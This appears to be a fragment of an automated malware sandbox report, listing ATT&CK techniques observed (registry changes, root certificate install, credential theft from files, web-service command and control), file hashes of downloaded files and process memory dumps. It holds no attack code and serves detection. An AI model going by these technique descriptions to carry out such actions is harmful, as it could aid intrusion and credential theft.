                                                                                                                                                                                        1
                                                                                                                                                                                        T1060

                                                                                                                                                                                        Defense Evasion

                                                                                                                                                                                        Modify Registry

                                                                                                                                                                                        2
                                                                                                                                                                                        T1112

                                                                                                                                                                                        Install Root Certificate

                                                                                                                                                                                        1
                                                                                                                                                                                        T1130

                                                                                                                                                                                        Credential Access

                                                                                                                                                                                        Credentials in Files

                                                                                                                                                                                        4
                                                                                                                                                                                        T1081

                                                                                                                                                                                        Discovery

                                                                                                                                                                                        Query Registry

                                                                                                                                                                                        3
                                                                                                                                                                                        T1012

                                                                                                                                                                                        System Information Discovery

                                                                                                                                                                                        4
                                                                                                                                                                                        T1082

                                                                                                                                                                                        Remote System Discovery

                                                                                                                                                                                        1
                                                                                                                                                                                        T1018

                                                                                                                                                                                        Collection

                                                                                                                                                                                        Data from Local System

                                                                                                                                                                                        4
                                                                                                                                                                                        T1005

                                                                                                                                                                                        Command and Control

                                                                                                                                                                                        Web Service

                                                                                                                                                                                        1
                                                                                                                                                                                        T1102

                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                        Downloads

                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
                                                                                                                                                                                          MD5

                                                                                                                                                                                          8ffd36d2ac663d99d79125142792e9cf

                                                                                                                                                                                          SHA1

                                                                                                                                                                                          741f749f1499077aab571d01a12a34df86d5c08f

                                                                                                                                                                                          SHA256

                                                                                                                                                                                          14afcdfcaaf716190322d7f28d4e403e240d991b641ef851ce62e5889d182c94

                                                                                                                                                                                          SHA512

                                                                                                                                                                                          4c82511388ac29266286c474cb04d78adb86b8a67135190691fdb38bd815eca17aab95696c1ec0225ef035b1e50e442839884388aa62ff8cba0ba5292e4b8527

                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\89.259.200\software_reporter_tool.exe
                                                                                                                                                                                          MD5

                                                                                                                                                                                          670e3a26ef44855f6fa0ec20ba262a62

                                                                                                                                                                                          SHA1

                                                                                                                                                                                          def4952964d0aea5e6558b1a554178eacffac265

                                                                                                                                                                                          SHA256

                                                                                                                                                                                          5fe1e44938260208fad3439c8c2ff3c82a79b07e70e2c80288b085eb3256bbc5

                                                                                                                                                                                          SHA512

                                                                                                                                                                                          3250bfb5f0ef83d606080a2f6aa13ec181d36486b7d96234bf05554797e461d4f0b3ea078eaa6e27287a39ed959fa354e60ed45931ed17575947777c0ad6a71a

                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\89.259.200\software_reporter_tool.exe
                                                                                                                                                                                          MD5

                                                                                                                                                                                          670e3a26ef44855f6fa0ec20ba262a62

                                                                                                                                                                                          SHA1

                                                                                                                                                                                          def4952964d0aea5e6558b1a554178eacffac265

                                                                                                                                                                                          SHA256

                                                                                                                                                                                          5fe1e44938260208fad3439c8c2ff3c82a79b07e70e2c80288b085eb3256bbc5

                                                                                                                                                                                          SHA512

                                                                                                                                                                                          3250bfb5f0ef83d606080a2f6aa13ec181d36486b7d96234bf05554797e461d4f0b3ea078eaa6e27287a39ed959fa354e60ed45931ed17575947777c0ad6a71a

                                                                                                                                                                                        • \??\c:\users\admin\appdata\local\Google\Software Reporter Tool\settings.dat
                                                                                                                                                                                          MD5

                                                                                                                                                                                          a4f9aa76df2cddc5c337dc784c5d8f54

                                                                                                                                                                                          SHA1

                                                                                                                                                                                          65a9f4cc993479946f5d2e8d60bdfa218733d588

                                                                                                                                                                                          SHA256

                                                                                                                                                                                          c1529e24c3fb86398622edc73a7c28999b6f3a6f1e62f34a40da84ae8c4e01c9

                                                                                                                                                                                          SHA512

                                                                                                                                                                                          6553c7f866b224cfd2bdac203f4281b05131020ee153a8229074bea59917c2fe8a558c68941d15b8b7bd903cf67e52b3b6c3ae54299dc5fe66add4de3a0cabce

                                                                                                                                                                                        • \??\pipe\crashpad_4908_RREJPODBPPQTURCM
                                                                                                                                                                                          MD5

                                                                                                                                                                                          d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                          SHA1

                                                                                                                                                                                          da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                          SHA256

                                                                                                                                                                                          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                          SHA512

                                                                                                                                                                                          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                        • \??\pipe\crashpad_644_LUGSNNMPZIQDTAQM
                                                                                                                                                                                          MD5

                                                                                                                                                                                          d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                          SHA1

                                                                                                                                                                                          da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                          SHA256

                                                                                                                                                                                          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                          SHA512

                                                                                                                                                                                          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                        • memory/68-260-0x0000027FAC210000-0x0000027FAC277000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          412KB

                                                                                                                                                                                        • memory/340-310-0x0000026116D40000-0x0000026116DA7000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          412KB

                                                                                                                                                                                        • memory/340-275-0x0000026116740000-0x00000261167A7000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          412KB

                                                                                                                                                                                        • memory/496-155-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/804-280-0x00000000005C0000-0x000000000070A000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          1.3MB

                                                                                                                                                                                        • memory/804-281-0x0000000000400000-0x00000000004B4000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          720KB

                                                                                                                                                                                        • memory/1004-240-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/1040-163-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/1096-257-0x0000029F00770000-0x0000029F007D7000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          412KB

                                                                                                                                                                                        • memory/1120-272-0x0000021B9E920000-0x0000021B9E987000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          412KB

                                                                                                                                                                                        • memory/1180-278-0x0000026034FB0000-0x0000026035017000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          412KB

                                                                                                                                                                                        • memory/1212-294-0x0000000004970000-0x0000000004971000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          4KB

                                                                                                                                                                                        • memory/1292-291-0x00000000050D0000-0x00000000050D1000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          4KB

                                                                                                                                                                                        • memory/1332-207-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/1356-137-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/1376-265-0x000002AD6F400000-0x000002AD6F467000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          412KB

                                                                                                                                                                                        • memory/1384-287-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          3.5MB

                                                                                                                                                                                        • memory/1428-277-0x000001F56A200000-0x000001F56A267000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          412KB

                                                                                                                                                                                        • memory/1428-304-0x000001F56A2E0000-0x000001F56A347000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          412KB

                                                                                                                                                                                        • memory/1452-116-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/1624-147-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/1648-140-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/1868-244-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/1908-263-0x000001430C400000-0x000001430C467000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          412KB

                                                                                                                                                                                        • memory/1956-292-0x0000000005180000-0x0000000005181000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          4KB

                                                                                                                                                                                        • memory/1956-128-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/2104-211-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/2132-282-0x0000000010000000-0x000000001019E000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          1.6MB

                                                                                                                                                                                        • memory/2132-279-0x0000000000F80000-0x00000000010D7000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          1.3MB

                                                                                                                                                                                        • memory/2228-237-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/2280-229-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/2344-226-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/2576-276-0x00000154C7CD0000-0x00000154C7D37000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          412KB

                                                                                                                                                                                        • memory/2608-253-0x000002209B490000-0x000002209B4F7000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          412KB

                                                                                                                                                                                        • memory/2756-299-0x0000028AEC540000-0x0000028AEC5A7000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          412KB

                                                                                                                                                                                        • memory/2756-250-0x0000028AEBFA0000-0x0000028AEC007000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          412KB

                                                                                                                                                                                        • memory/2836-308-0x000001B333AB0000-0x000001B333B17000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          412KB

                                                                                                                                                                                        • memory/2836-269-0x000001B333A40000-0x000001B333AA7000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          412KB

                                                                                                                                                                                        • memory/2852-267-0x000001D2CBB40000-0x000001D2CBBA7000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          412KB

                                                                                                                                                                                        • memory/2852-306-0x000001D2CC0A0000-0x000001D2CC107000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          412KB

                                                                                                                                                                                        • memory/3048-248-0x0000000002EE0000-0x000000000307C000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          1.6MB

                                                                                                                                                                                        • memory/3172-293-0x00000000029E0000-0x0000000002A72000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          584KB

                                                                                                                                                                                        • memory/3648-122-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/3664-295-0x00000000051E0000-0x00000000051E1000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          4KB

                                                                                                                                                                                        • memory/3760-121-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/3760-124-0x00007FFBBC1C0000-0x00007FFBBC1C1000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          4KB

                                                                                                                                                                                        • memory/3816-247-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4068-150-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4128-230-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4172-208-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4220-209-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4268-227-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4308-290-0x000000001C960000-0x000000001C962000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          8KB

                                                                                                                                                                                        • memory/4312-177-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4344-210-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4364-236-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4428-212-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4524-213-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4544-184-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4544-232-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4556-224-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4568-297-0x0000000004D10000-0x0000000005316000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          6.0MB

                                                                                                                                                                                        • memory/4584-234-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4604-251-0x000002231A2C0000-0x000002231A304000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          272KB

                                                                                                                                                                                        • memory/4604-288-0x000002231C900000-0x000002231CA05000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          1.0MB

                                                                                                                                                                                        • memory/4604-255-0x000002231A470000-0x000002231A4D7000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          412KB

                                                                                                                                                                                        • memory/4604-189-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4628-214-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4644-228-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4648-216-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4656-193-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4664-215-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4684-238-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4692-194-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4696-217-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4720-218-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4728-195-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4744-241-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4764-196-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4768-219-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4768-289-0x0000028FAC4B0000-0x0000028FAC4D0000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          128KB

                                                                                                                                                                                        • memory/4768-286-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          7.0MB

                                                                                                                                                                                        • memory/4768-296-0x0000028FAC5D0000-0x0000028FAC5F0000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          128KB

                                                                                                                                                                                        • memory/4780-285-0x0000000003650000-0x0000000003697000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          284KB

                                                                                                                                                                                        • memory/4788-239-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4800-197-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4820-221-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4828-220-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4836-198-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4848-199-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4860-222-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4864-233-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4872-242-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4884-283-0x00000000005C0000-0x000000000070A000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          1.3MB

                                                                                                                                                                                        • memory/4888-223-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4908-200-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4928-201-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4980-202-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4980-284-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          284KB

                                                                                                                                                                                        • memory/5028-203-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/5044-204-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/5048-231-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/5056-205-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/5056-235-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/5072-270-0x0000000003560000-0x00000000035B6000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          344KB

                                                                                                                                                                                        • memory/5072-249-0x0000000001070000-0x00000000011BA000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          1.3MB

                                                                                                                                                                                        • memory/5116-225-0x0000000000000000-mapping.dmp